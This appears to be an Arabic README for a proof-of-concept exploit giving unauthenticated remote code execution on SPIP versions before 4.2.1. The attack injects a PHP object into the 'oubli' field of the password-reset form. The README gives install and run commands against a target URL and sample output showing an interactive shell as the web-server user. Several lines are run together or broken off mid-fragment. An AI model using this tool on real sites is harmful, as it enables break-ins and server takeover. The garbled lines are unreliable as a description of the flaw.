
استغلال إثبات المفهوم لتنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه في SPIP < 4.2.1 عبر حقن كائن PHP في نموذج إعادة تعيين كلمة المرور. يوفر قشرة تفاعلية مع معالجة رمز CSRF.
ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في SPIP قبل الإصدار 4.2.1. معامل
oubliفي نموذج إعادة تعيين كلمة المرور عرضة لحقن كائنات PHP بسبب سوء معالجة إلغاء التسلسل. يتم تنفيذ حمولة مسلسلة مصممة خصيصًا من جانب الخادم كمستخدم الويب، وينعكس المخرجات في الاستجابة داخل قيمة حقل الإدخالoubli.
/spip.php?page=spip_pass.oubli.value المنعكسة في الاستجابة.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
مثال:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] جلب رمز مكافحة CSRF...
[*] اختبار تنفيذ الأمر...
[+] الهدف ضعيف! المخرجات: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] تم فتح الصدفة. اكتب 'exit' أو Ctrl+C للخروج.
Shell> whoami
www-data